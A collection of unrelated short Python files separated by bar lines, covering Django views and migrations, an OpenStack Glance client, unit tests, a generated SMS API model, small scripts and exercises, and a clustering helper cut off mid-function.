url(r'edit/(?P<pk>\d+)$', UserExtendedUpdateAPIView.as_view(), name='update'),
url(r'delete/(?P<pk>\d+)$', UserExtendedDeleteAPIView.as_view(), name='delete'),
url(r'create/$', UserExtendedCreateAPIView.as_view(), name='create'),
url(r'register/$', UserCreateAPIView.as_view(), name='register'),
url(r'login/$', UserLoginAPIView.as_view(), name='login'),
]
|
class Cat(object):
"""docstring for Cat"""
def __init__(self, arg):
super(Cat, self).__init__()
self.arg = arg
c = Cat('ss')
Cat.eat(c,'mycat')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-01-27 19:00
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0006_remove_username_hack'),
]
operations = [
migrations.AddField(
model_name='label',
name='github_id',
field=models.PositiveIntegerField(blank=True, null=True, unique=True),
),
]
|
def gcd(x, y):
if y == 0:
return x
else:
return gcd(y, x % y)
nums = list(map(int, input().split()))
x, y = max(nums), min(nums)
GCD = gcd(x, y)
LCM = x*y//GCD
print(GCD)
print(LCM)
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# author: fmount <francesco.pantano@linux.com>
from keystoneauth1.identity import v2
from keystoneauth1 import session
from keystoneauth1 import loading
from glanceclient import Client
from prettytable import PrettyTable
from handlers import Error, ConflictException, ForbiddenException
import json
import logging
import sys
import re
# DEBUG SECTION
logging.basicConfig(stream=sys.stderr, level=logging.INFO)
LOG = logging.getLogger(__name__)
##
# TODO: LOG.propagate = True | False (Toggle logging propagation)
class Wglance():
# Just to make sure there is only one client
__instance = None
def __init__(self, u, mode, debug):
if Wglance.__instance:
raise Exception("Just one client per session allowed!")
Wglance.__instance = self
self.user = u
if(mode == "password"):
loader = loading.get_plugin_loader('password')
auth = loader.load_from_options(auth_url=u.endpoint, username=u.name, \
password=u.password, tenant_name=u.tenant_name)
else:
auth = v2.Password(username=u.name, password=u.password, \
tenant_name=u.tenant_name, auth_url=u.endpoint)
self.s = session.Session(auth=auth)
self.glance = Client('2', session=self.s)
self.debug = debug
def __str__(self):
print(self.glance)
def saysomething(self):
print "I exist"
def exists(self, image_id):
'''
TODO: Check if the image type is NOT "snapshot"
'''
try:
self.glance.images.get(image_id)
return True
except Exception, e:
if(re.search('^404*', str(e))):
LOG.error("[404] IMAGE %s NOT FOUND" % image_id)
return False
return False
def image_show(self, image_id):
table = PrettyTable(['Property', 'Value'])
for k, v in json.loads(json.dumps(self.glance.images.get(image_id))).items():
table.add_row([k, v])
print(table)
def toggle_visibility(self, image_id, visibility):
if visibility is "private":
self.glance.images.update(image_id, visibility='private')
elif visibility is "public":
self.glance.images.update(image_id, visibility='public')
LOG.info("Visibility for image %s is now %s" % (image_id, visibility))
#print("Visibility for image %s is now %s" % (image_id, visibility))
# Add a share for the image provided;
def add_share(self, image_id, tenant_id):
'''
>> image_id: the image provided
>> tenant_id: an array of id who share the image
'''
try:
LOG.info("Adding member %s for image %s " % (tenant_id, image_id))
#print("Adding member %s for image %s " % (tenant_id, image_id))
self.glance.image_members.create(image_id, tenant_id)
self.update_membership_status(image_id, tenant_id, "accepted")
except Exception as e:
if(re.search('^409*', str(e))):
LOG.error("[409] THIS MEMBERSHIP WAS ALREADY DEFINED")
elif(re.search('^403*', str(self.error))):
LOG.error("[403] FORBIDDEN")
def delete_image(self, image_id):
self.glance.images.delete(image_id)
def remove_share(self, image_id, tenant_id):
'''
>> image_id: the image provided
>> tenant_id: an array of id who share the image
'''
try:
LOG.info("Remove member %s for image %s " % (tenant_id, image_id))
m = self.glance.image_members.delete(image_id, tenant_id)
if(re.search('^40{1}', m)):
raise Exception("Something about Permissions went wrong: ch[mod|own] something")
except:
raise Exception("No idea what could go wrong..")
def update_membership_status(self, image_id, tenant_id, status):
self.glance.image_members.update(image_id, tenant_id, status)
def print_image_list(self):
table = PrettyTable(['ID', 'VISIBILITY', 'DEPRECATED'])
for image in self.glance.images.list():
img = json.loads(json.dumps(image))
table.add_row([img.get('id'), img.get('visibility'), img.get('deprecated',\
'no_deprecated')])
print(table)
def get_image_list(self):
imgs = []
for image in self.glance.images.list():
img = json.loads(json.dumps(image))
imgs.append(img.get('id'))
return imgs
def show_member_list(self, image_id):
'''
Show the member list for the given image
'''
table = PrettyTable(['Image ID', 'Member ID', 'Status [CAN SHARE]'])
for member in self.glance.image_members.list(image_id):
mbm = json.loads(json.dumps(member))
table.add_row([mbm.get('image_id'), mbm.get('member_id'), mbm.get('status')])
print(table)
def member_list(self, image_id):
'''
Return a list containing all members for the given image
'''
member_list = []
# table = PrettyTable(['Image ID', 'Member ID', 'Status [CAN SHARE]'])
for member in self.glance.image_members.list(image_id):
mbm = json.loads(json.dumps(member))
# table.add_row([mbm.get('image_id'), mbm.get('member_id'), mbm.get('status')])
member_list.append(mbm.get('member_id'))
# print(table)
return member_list
def get_all_images(self):
img_list = []
for image in self.glance.images.list():
img = json.loads(json.dumps(image))
img_list.append(img.get('id'))
return img_list
def is_visible(self, image_id):
for k, v in json.loads(json.dumps(self.glance.images.get(image_id))).items():
if(k == "visibility" and v is "public"):
return True
return False
def is_deprecated(self, image_id):
for k, v in json.loads(json.dumps(self.glance.images.get(image_id))).items():
if(k == "deprecated"):
LOG.info("[DEBUG] The image %s IS deprecated " % image_id)
return v
LOG.info("[DEBUG] The image %s is NOT deprecated " % image_id)
#print("[DEBUG] The image %s is NOT deprecated " % image_id)
return False
def toggle_deprecated(self, image_id, bool_value):
if self.is_visible(image_id) is False:
self.glance.images.update(image_id, deprecated=str(bool_value))
return True
LOG.WARN("Cannot Deprecate the image %s : Make it private first!!" % image_id)
#print("Cannot Deprecate the image %s : Make it private first!!" % image_id)
return False
def is_shared(self, image_id, tenant_id):
if len(self.member_list(image_id)) > 0:
return True
else:
return False
|
import unittest
import sys, os
myPath = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, myPath + '/../src')
from bio_convertors import dna_to_rna, dna_to_protein, reverse_complement, gc_content
class TestBioConvertors(unittest.TestCase):
def test_dna_to_rna(self):
#Arrange
sequence = "ACGT"
#Act
rna = dna_to_rna(sequence)
#Assert
self.assertEqual(rna, "ACGU")
def test_dna_to_protein(self):
#Arrange
sequence = "TCAGG"
#Act
protein = dna_to_protein(sequence)
#Assert
self.assertEqual(protein['frame 1:'], "S")
def test_reverse_complement(self):
#Arrange
sequence = "TCAGG"
#Act
seq_reversed = reverse_complement(sequence)
#Assert
self.assertEqual(seq_reversed, "CCTGA")
def test_gc_content(self):
#Arrange
sequence = "TCAGGA"
#Act
gc = gc_content(sequence)
#Assert
self.assertEqual(gc, 0.5)
def main():
unittest.main()
if __name__ == "__main__":
main() |
from ..type import SimpleType
class NumericString(SimpleType):
def __init__(self):
super(NumericString, self).__init__()
self.typereference = "NumericString"
|
from setuptools import setup
DESCRIPTION = "Alexa Skills Kit API ported to Python"
setup(
name="alexa-skills-kit",
version="0.0.1",
author="Ian Adam Naval",
author_email="ianonavy@gmail.com",
description=DESCRIPTION,
license="MIT",
keywords="alexa skills kit voice recognition",
url="https://github.com/python-alexa-skills-kit",
packages=['alexa'],
long_description=DESCRIPTION,
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: MIT License",
],
)
|
import sys
import gui
from PyQt5 import QtWidgets
#Criação da janela
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
janela = QtWidgets.QMainWindow()
ui = gui.Ui_janela()
ui.setupUi(janela)
janela.show()
sys.exit(app.exec_()) |
# export PYTHONPATH=[...]/src
# 项目下运行
# export PYTHONPATH=$PYTHONPATH:`pwd`:`pwd`/src
# 对LFW数据库进行人脸检测和对齐的方法命令
'''
python3 src/align/align_dataset_mtcnn.py \
~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/dataset/lfw/raw \
~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/dataset/lfw/lfw_mtcnnpy_160 \
--image_size 160 --margin 32 \
--random_order
'''
'''
Output:
Total number of images: 13233
Number of successfully aligned images: 13233
'''
# 校验LFW数据库准确率
'''
python3 src/validate_on_lfw.py \
~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/dataset/lfw/lfw_mtcnnpy_160 \
~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/models/facenet/20170512-110547/
'''
'''
Output:
Runnning forward pass on LFW images
Accuracy: 0.992+-0.003
Validation rate: 0.97467+-0.01477 @ FAR=0.00133
Area Under Curve (AUC): 1.000
Equal Error Rate (EER): 0.007
'''
# 计算人脸两两之间的距离
'''
python3 src/compare.py \
~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/models/facenet/20170512-110547/ \
./test_imgs/1.jpg ./test_imgs/2.jpg ./test_imgs/3.jpg
'''
'''
Output:
Images:
0: ./test_imgs/1.jpg
1: ./test_imgs/2.jpg
2: ./test_imgs/3.jpg
Distance matrix
0 1 2
0 0.0000 0.7270 1.1283
1 0.7270 0.0000 1.0913
2 1.1283 1.0913 0.0000
'''
# 用MTCNN进行检测和对齐CASIA数据集
'''
python3 src/align/align_dataset_mtcnn.py \
~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/dataset/casia/raw/ \
~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/dataset/casia/casia_maxpy_mtcnnpy_182 \
--image_size 182 --margin 44
'''
# 重新进行训练新模型
'''
python3 src/train_softmax.py \
--logs_base_dir ~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/logs/facenet/ \
--models_base_dir ~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/models/facenet/ \
--data_dir ~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/dataset/casia/casia_maxpy_mtcnnpy_182 \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--lfw_dir ~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/dataset/lfw/lfw_mtcnnpy_160 \
--optimizer RMSPROP \
--learning_rate -1 \
--max_nrof_epochs 80 \
--keep_probability 0.8 \
--random_crop --random_flip \
--learning_rate_schedule_file
data/learning_rate_schedule_classifier_casia.txt \
--weight_decay 5e-5 \
--center_loss_factor 1e-2 \
--center_loss_alfa 0.9
'''
|
from mitmproxy import ctx
def load(l):
ctx.log.info("Registering option 'custom'")
l.add_option("custom", bool, False, "A custom option")
def configure(options, updated):
if "custom" in updated:
ctx.log.info("custom option value: %s" % options.custom)
|
import argparse
import asyncio
import ssl
import aiohttp
@asyncio.coroutine
def main(conn, url):
with aiohttp.ClientSession(connector=conn) as session:
try:
response = yield from session.get(url)
yield from response.release()
except aiohttp.errors.ClientOSError as exc:
while exc is not None:
exc = exc.__cause__
if isinstance(exc, ssl.SSLError):
print('REJECT')
break
else:
raise
except ssl.CertificateError:
print('REJECT')
else:
print('ACCEPT')
ap = argparse.ArgumentParser()
ap.add_argument('host')
ap.add_argument('port')
ap.add_argument('cafile', nargs='?')
options = ap.parse_args()
url = 'https://{host}:{port}'.format(**vars(options))
if options.cafile is not None:
context = ssl.create_default_context(cafile=options.cafile)
conn = aiohttp.TCPConnector(ssl_context=context)
else:
conn = None
loop = asyncio.get_event_loop()
loop.run_until_complete(main(conn, url))
|
class ExecutionException(Exception):
def __init__(self, *args):
self.message = args[0] if args else None
super().__init__(*args)
def __str__(self):
return self.message or super().__str__() |
# Given an array of statue sizes in a random order, how many additional statues
# would you need to arrange each statue so that each statue is only 1 unit taller than the previous one?
# All statues will have sizes between 0 and 20, and the given array will have a maximum length of 10.
# Example
# For the array of statues = [6, 2, 3, 8], the output should be
# numberStatues(statues) = 3.
# The completed set of statues needs the sizes 4, 5 and 7.
statues = [5, 4, 6]
lower_limit = statues[0]
for y in statues:
if y <= lower_limit -1:
lower_limit = y
upper_limit = statues[0]
for x in statues:
if x >= upper_limit + 1:
upper_limit = x
length = len(statues)
if (upper_limit - lower_limit) >= 0:
print(((upper_limit - lower_limit)-(length))+1)
else:
print(0)
# def numberStatues(statues):
# print( numberStatues( [6, 2, 3, 8]) )
# return True
# ******** Tests ************
# print( numberStatues( [6, 2, 3, 8]) )
# print( numberStatues( [5, 4, 6] ) )
# print( numberStatues( [6, 3] ) )
# print( numberStatues( [0, 3] ) )
# print( numberStatues( [19, 5, 8, 14, 11]) ) |
import math
n=int(raw_input("What is the index of your favorite prime? "))
def isprime(n):
if n<2:
return False
elif n==2:
return True
else:
for x in range(2, int(math.ceil(math.sqrt(n)))+1):
if n%x==0:
return False
return True
def prime(n):
list=[];
i=0;
while len(list)<n:
if isprime(i):
list.append(i)
i+=1
print list
prime(n) |
import re
import requests
import html
import time
from bs4 import BeautifulSoup
def crawl_joke_list_use_bs4(page=1):
url = "http://www.qiushibaike.com/8hr/page/" + str(page)
res = requests.get(url)
soup = BeautifulSoup(res.content, "html.parser")
joke_list = soup.find_all("div", class_="article block untagged mb15")
for child in joke_list:
print(child.find("h2").string + "\t" + "".join(child.find("div", class_="content").stripped_strings))
time.sleep(1)
if __name__ == '__main__':
crawl_joke_list_use_bs4(1)
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure fixed base setting is extracted properly.
"""
import TestGyp
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
CHDIR = 'linker-flags'
test.run_gyp('fixed-base.gyp', chdir=CHDIR)
test.build('fixed-base.gyp', test.ALL, chdir=CHDIR)
def GetHeaders(exe):
full_path = test.built_file_path(exe, chdir=CHDIR)
return test.run_dumpbin('/headers', full_path)
# For exe, default is fixed, for dll, it's not fixed.
if 'Relocations stripped' not in GetHeaders('test_fixed_default_exe.exe'):
test.fail_test()
if 'Relocations stripped' in GetHeaders('test_fixed_default_dll.dll'):
test.fail_test()
# Explicitly not fixed.
if 'Relocations stripped' in GetHeaders('test_fixed_no.exe'):
test.fail_test()
# Explicitly fixed.
if 'Relocations stripped' not in GetHeaders('test_fixed_yes.exe'):
test.fail_test()
test.pass_test()
|
"""Helpers used for backup package"""
from pathlib import Path
import sys
sys.path.insert(0, str(Path(__file__).absolute().parents[1] / "lib")) # add libraries to path
from colorama import Fore, Style, init # type: ignore
init()
from typing import Union
def error_message(text: str, level: int) -> None:
"""Gives a colored error message to user. When level is 3, the program exits"""
if level == 3:
print(f'{Fore.RED}{text}{Style.RESET_ALL}', file=sys.stderr)
sys.exit(1)
elif level == 2:
# orange
pass
elif level == 1:
print(f'{Fore.YELLOW}{text}{Style.RESET_ALL}')
def getDataFolder() -> Path:
return Path(__file__).absolute().parents[2] / "data"
def file_exists(filename: str) -> bool:
"""Check if file exists"""
file = Path(filename)
if file.is_file():
return True
else:
return False
def dir_exists(directory: str) -> bool:
dir = Path(directory)
if dir.is_dir():
return True
else:
return False
def str2bool(v: str) -> Union[str, bool]:
"""Convert string to bool"""
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
return "not bool"
def set_default_directory(directory: str) -> None:
"""Set the default directory"""
(getDataFolder() / 'dir.txt').write_text(str(directory));
def default_directory_exists():
return (getDataFolder() / 'dir.txt').exists()
def check_for_duplicates(target):
"""Check for target duplicates in database"""
contents = (getDataFolder() / 'db.json').read_text()
if contents.find(f'"target": "{str(target)}"') != -1:
error_message(f"Target {target} already exists. Use update to update a queriy, or use remove to remove it.", 3)
def check_if_use_saved_directory(directory: str)-> str:
"""Returns args.directory if not None, otherwise return saved directory at ./data/dir.txt"""
if directory == None:
return (getDataFolder() / 'dir.txt').read_text()
else:
return directory
|
from ufo_scraper import get_ufos
import requests
def bot(location):
ufos = get_ufos()
sufos = sorted(ufos, key=lambda u: u['date'], reverse=True)
latest_ufo = sufos[0]
make_story(location, latest_ufo)
def make_locator_map(starting_location, ending_location):
base_endpoint = 'https://maps.googleapis.com/maps/api/staticmap'
myparams = {}
myparams['size'] = '600x400'
myparams['markers'] = []
myparams['markers'].append('color:purple|' + starting_location)
myparams['markers'].append('color:red|' + ending_location)
preq = requests.PreparedRequest()
preq.prepare_url(base_endpoint, myparams)
return preq.url
def make_story(user_location, ufo):
storytemplate = """On {date}, a {shape} shape UFO was seen near {place}. The report includes the following summary: {summary}. \n Here is where {user_location} is in relation to the UFO:
{url}"""
google_map_url = make_locator_map(user_location, ufo['location'])
story = storytemplate.format(date=ufo['date'], shape=ufo['shape'], place=ufo['location'], url=google_map_url, user_location=user_location, summary=ufo['summary'])
print(story.strip())
|
""" Необходимо создать (не программно) текстовый файл,
где каждая строка описывает учебный предмет и наличие
лекционных, практических и лабораторных занятий по этому
предмету и их количество. Важно, чтобы для каждого
предмета не обязательно были все типы занятий.
Сформировать словарь, содержащий название предмета и
общее количество занятий по нему. Вывести словарь на
экран. """
with open("lesson5_6.txt", 'r', encoding='utf-8') as file:
str = file.readlines()
tmp = []
for itm in str:
itm = itm.split(':')
tmp.append(itm)
str = tmp
for elem in str: # получаю подсписок
idx = 0
tmp = ''
for itm in elem: # строка из списка
sum = 0
if idx % 2 == 1:
for char in itm: # симовол из строки
if char.isdigit():
tmp += char
elif char == '(':
tmp += ' '
tmp = tmp.split(' ')
for num in tmp:
if num.isdigit():
sum += int(num)
idx +=1
elem[1] = sum
result = dict(str)
print(result)
|
from __future__ import print_function
import Molecules as m
from m.models.unsupervised import *
from m.utils import Extract as ex
class AutoEncoderTestSuite(object):
def __init__(self):
pass
def regression_test(self):
print("Regression testing ...\n")
self.test_pytorch_vae()
self.test_pytorch_cvae()
self.test_keras_vae()
self.test_keras_cvae()
print("Finished regression testing\n")
def test_pytorch_vae(self):
print("Testing pytorch VAE\n")
batch_size = 32
epochs = 2
structure_path = "./protein.pdb"
trajectory_path = "./cont-mat.array"
native_contact = ex.ExtractNativeContact(structure_path, trajectory_path)
native_contact.extract_native_contact()
x_train, x_test = native_contact.load_native_contact(split=0.8)
input_shape = x_train.shape[1]*x_train.shape[1]
encoder = LinEncoder(latent_size = 3,
input_size = input_shape,
num_layers = 5,
activation = 'relu')
decoder = LinDecoder(latent_size = 3,
output_size = input_shape,
num_layers = 5,
activation = 'relu')
autoEncoder = AutoEncoder(encoder, decoder, mode='pytorch')
autoEncoder.summary()
autoEncoder.fit(X_train)
autoEncoder.predict(x_test)
print ("Finished testing pytorch VAE\n")
def test_pytorch_cvae(self):
print("Testing pytorch CVAE\n")
batch_size = 32
epochs = 2
structure_path = "./protein.pdb"
trajectory_path = "./cont-mat.array"
native_contact = ex.ExtractNativeContact(structure_path, trajectory_path)
native_contact.extract_native_contact()
x_train, x_test = native_contact.load_native_contact(split=0.8)
input_shape = x_train.shape[1]*x_train.shape[1]
encoder = LinEncoder(latent_size = 3,
input_size = input_shape,
num_layers = 5,
activation = 'relu')
decoder = LinDecoder(latent_size = 3,
output_size = input_shape,
num_layers = 5,
activation = 'relu')
autoEncoder = AutoEncoder(encoder, decoder, mode='pytorch')
autoEncoder.summary()
autoEncoder.fit(X_train)
autoEncoder.predict(x_test)
print ("Finished testing pytorch CVAE\n")
def test_keras_vae(self):
print("Testing keras VAE\n")
batch_size = 32
epochs = 2
structure_path = "./protein.pdb"
trajectory_path = "./cont-mat.array"
native_contact = ex.ExtractNativeContact(structure_path, trajectory_path)
native_contact.extract_native_contact()
x_train, x_test = native_contact.load_native_contact(split=0.8)
input_shape = x_train.shape[1]*x_train.shape[1]
encoder = LinEncoder(latent_size = 3,
input_size = input_shape,
num_layers = 5,
activation = 'relu')
decoder = LinDecoder(latent_size = 3,
output_size = input_shape,
num_layers = 5,
activation = 'relu')
autoEncoder = AutoEncoder(encoder, decoder, mode='pytorch')
autoEncoder.summary()
autoEncoder.fit(X_train)
autoEncoder.predict(x_test)
print ("Finished testing keras VAE\n")
def test_keras_cvae(self):
print("Testing keras CVAE\n")
batch_size = 32
epochs = 2
structure_path = "./protein.pdb"
trajectory_path = "./cont-mat.array"
native_contact = ex.ExtractNativeContact(structure_path, trajectory_path)
native_contact.extract_native_contact()
x_train, x_test = native_contact.load_native_contact(split=0.8)
input_shape = x_train.shape[1]*x_train.shape[1]
encoder = LinEncoder(latent_size = 3,
input_size = input_shape,
num_layers = 5,
activation = 'relu')
decoder = LinDecoder(latent_size = 3,
output_size = input_shape,
num_layers = 5,
activation = 'relu')
autoEncoder = AutoEncoder(encoder, decoder, mode='pytorch')
autoEncoder.summary()
autoEncoder.fit(X_train)
autoEncoder.predict(x_test)
print ("Finished testing keras CVAE\n")
|
import os
import argparse
from os.path import isfile, join
import cv2
import numpy as np
from tqdm.auto import tqdm
def convert_frames_to_video(pathIn:str, pathOut:str, fps:int):
frame_array = []
files = [f for f in os.listdir(pathIn) if isfile(join(pathIn, f))]
#for sorting the file names properly
files.sort(key = lambda x: int(x.split("_")[-1].split(".")[0]))
filename=os.path.join(pathIn, files[0])
img = cv2.imread(filename)
height, width, layers = img.shape
size = (width, height)
for i in tqdm(range(len(files))):
filename=os.path.join(pathIn, files[i])
#reading each files
img = cv2.imread(filename)
height, width, layers = img.shape
size = (width, height)
#print(filename)
#inserting the frames into an image array
frame_array.append(img)
out = cv2.VideoWriter(pathOut,cv2.VideoWriter_fourcc(*'DIVX'), fps, size)
for i in range(len(frame_array)):
# writing to a image array
out.write(frame_array[i])
out.release()
print(f"video saved: {pathOut}")
def main():
parser = argparse.ArgumentParser(description="Deep Dream tutorial")
parser.add_argument("--frames_dir", default="dream_seq", required=True, type=str,
help="Directory for frames created using keep_dreaming.py")
parser.add_argument("--output_file", default="results/video.avi", type=str, help="Path of output video.")
parser.add_argument("--fps", default=30, type=int, help="Frames per second for video")
args = parser.parse_args()
pathIn= args.frames_dir
pathOut = args.output_file
fps = args.fps
convert_frames_to_video(pathIn, pathOut, fps)
if __name__=="__main__":
main() |
#!/usr/bin/python
import re
hand = open('../../file1.text')
for line in hand:
line = line.rstrip()
if re.search('^xdg', line): # <==> if line.startswith('xdg'):
print(line)
print()
x = 'My 2 favorite numbers are 43, 34 and 44'
y = re.findall('[0-9]+', x)
print(y)
print()
s1 = 'From stephen.marquard@uct.ac.za Sat Jan 5 09:14:16 2008'
print(re.findall('\S+?@\S+', s1))
print()
|
from random import randint
t = 1
print(t)
for i in range(1, t+1):
n = randint(950, 1000)
print(n)
for j in range(1, n+1):
print(randint(1, 1000000000), end = ' ') |
__author__ = 'madsens'
import Movies
print 'Starting'
Movies.StartLoop('/home/pi/Halloween2015/Assets/LivingLogo')
|
from django.contrib import admin
from .models import Unit, Fermenter, BatchNoteType, BatchTestType, Batch, BatchNote, BatchTest, BatchCategory, BatchStyle
# Register your models here.
admin.site.register(Unit)
admin.site.register(Fermenter)
admin.site.register(BatchNoteType)
admin.site.register(BatchTestType)
admin.site.register(Batch)
admin.site.register(BatchNote)
admin.site.register(BatchTest)
admin.site.register(BatchStyle)
admin.site.register(BatchCategory) |
def divide_2(n):
i = 0
while 1:
if n % 2 == 0:
n /= 2
i += 1
else:
return i
N = int(input())
A = list(map(int,input().split()))
ans = 201
for i in A:
i_div2 = divide_2(i)
if i_div2 < ans:
ans = i_div2
print(ans) |
large=0
for n in [12,30,35,67,3,56]:
if n>large:
large=n
print(large,n)
print("hell",large)
|
# coding: utf-8
"""
Telstra SMS Messaging API
The Telstra SMS Messaging API allows your applications to send and receive SMS text messages from Australia's leading network operator. It also allows your application to track the delivery status of both sent and received SMS messages.
OpenAPI spec version: 2.1.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class MessageSentResponse(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, to=None, delivery_status=None, description=None, message_id=None, message_type=None, number_segements=None):
"""
MessageSentResponse - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'to': 'str',
'delivery_status': 'str',
'description': 'str',
'message_id': 'str',
'message_type': 'str',
'number_segements': 'int'
}
self.attribute_map = {
'to': 'to',
'delivery_status': 'deliveryStatus',
'description': 'description',
'message_id': 'messageId',
'message_type': 'messageType',
'number_segements': 'numberSegements'
}
self._to = to
self._delivery_status = delivery_status
self._description = description
self._message_id = message_id
self._message_type = message_type
self._number_segements = number_segements
@property
def to(self):
"""
Gets the to of this MessageSentResponse.
The mobile phone number (in E.164 format) that the message was sent to.
:return: The to of this MessageSentResponse.
:rtype: str
"""
return self._to
@to.setter
def to(self, to):
"""
Sets the to of this MessageSentResponse.
The mobile phone number (in E.164 format) that the message was sent to.
:param to: The to of this MessageSentResponse.
:type: str
"""
if to is None:
raise ValueError("Invalid value for `to`, must not be `None`")
self._to = to
@property
def delivery_status(self):
"""
Gets the delivery_status of this MessageSentResponse.
The current status of the message for this address. Possible values are; 'DeliveryImpossible' – The message has been rejected and cannot be delivered. see the description field. 'MessageWaiting' – The message will be delivered as soon as possible.
:return: The delivery_status of this MessageSentResponse.
:rtype: str
"""
return self._delivery_status
@delivery_status.setter
def delivery_status(self, delivery_status):
"""
Sets the delivery_status of this MessageSentResponse.
The current status of the message for this address. Possible values are; 'DeliveryImpossible' – The message has been rejected and cannot be delivered. see the description field. 'MessageWaiting' – The message will be delivered as soon as possible.
:param delivery_status: The delivery_status of this MessageSentResponse.
:type: str
"""
if delivery_status is None:
raise ValueError("Invalid value for `delivery_status`, must not be `None`")
self._delivery_status = delivery_status
@property
def description(self):
"""
Gets the description of this MessageSentResponse.
This is a string that describes why a message could not be delivered.
:return: The description of this MessageSentResponse.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this MessageSentResponse.
This is a string that describes why a message could not be delivered.
:param description: The description of this MessageSentResponse.
:type: str
"""
self._description = description
@property
def message_id(self):
"""
Gets the message_id of this MessageSentResponse.
The message ID of the SMS that was sent. Use this ID to view the message status or to receive get responses.
:return: The message_id of this MessageSentResponse.
:rtype: str
"""
return self._message_id
@message_id.setter
def message_id(self, message_id):
"""
Sets the message_id of this MessageSentResponse.
The message ID of the SMS that was sent. Use this ID to view the message status or to receive get responses.
:param message_id: The message_id of this MessageSentResponse.
:type: str
"""
self._message_id = message_id
@property
def message_type(self):
"""
Gets the message_type of this MessageSentResponse.
A string that identifys the transport mechanism that was selected for delivering the the message.
:return: The message_type of this MessageSentResponse.
:rtype: str
"""
return self._message_type
@message_type.setter
def message_type(self, message_type):
"""
Sets the message_type of this MessageSentResponse.
A string that identifys the transport mechanism that was selected for delivering the the message.
:param message_type: The message_type of this MessageSentResponse.
:type: str
"""
allowed_values = ["SMS", "MMS", "RCS"]
if message_type not in allowed_values:
raise ValueError(
"Invalid value for `message_type` ({0}), must be one of {1}"
.format(message_type, allowed_values)
)
self._message_type = message_type
@property
def number_segements(self):
"""
Gets the number_segements of this MessageSentResponse.
An integer between 0 and 65536 that indicates the number of chargable segments in the message. For SMS this will be the number of segments the message had to be divided into (after convertion) to a character set understood by the SMS network.
:return: The number_segements of this MessageSentResponse.
:rtype: int
"""
return self._number_segements
@number_segements.setter
def number_segements(self, number_segements):
"""
Sets the number_segements of this MessageSentResponse.
An integer between 0 and 65536 that indicates the number of chargable segments in the message. For SMS this will be the number of segments the message had to be divided into (after convertion) to a character set understood by the SMS network.
:param number_segements: The number_segements of this MessageSentResponse.
:type: int
"""
self._number_segements = number_segements
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, MessageSentResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
import numpy as np
from sklearn.cluster import DBSCAN, MeanShift
from sklearn import metrics
from sklearn.preprocessing import StandardScaler
import image_utils
def _tri_coordinates_x(words):
""" gives us a list of ocr points [[left, center, right], ...]"""
return [(cord[0], center[0], cord[2])
for center, cord in zip(
image_utils.get_centroids_from_coords([word['coords'] for word in words]),
[word['coords'] for word in words]
)
]
def _tri_coordinates_y(words):
""" gives us a list of ocr points [[top, center, bottom], ...]"""
return [(cord[1], center[1], cord[3])
for center, cord in zip(
image_utils.get_centroids_from_coords([word['coords'] for word in words]),
[word['coords'] for word in words]
)
]
def cluster_column_tri(words, table_bounds, scale=True, triple=True):
Xx = _tri_coordinates_x(words)
Xy = _tri_coordinates_y(words)
Xx = [x for xl in Xx for x in xl] # flatten
Xy = [x for xl in Xy for x in xl] # flatten
print(table_bounds)
# print(cents)
if scale:
scaled = image_utils.scale_centroids(zip(Xx, Xy), table_bounds)
Xxs = [c[0] for c in scaled]
Xys = [c[1] for c in scaled]
Xxs = np.array(Xxs).reshape(-1, 1)
Xys = np.array(Xys).reshape(-1, 1)
else:
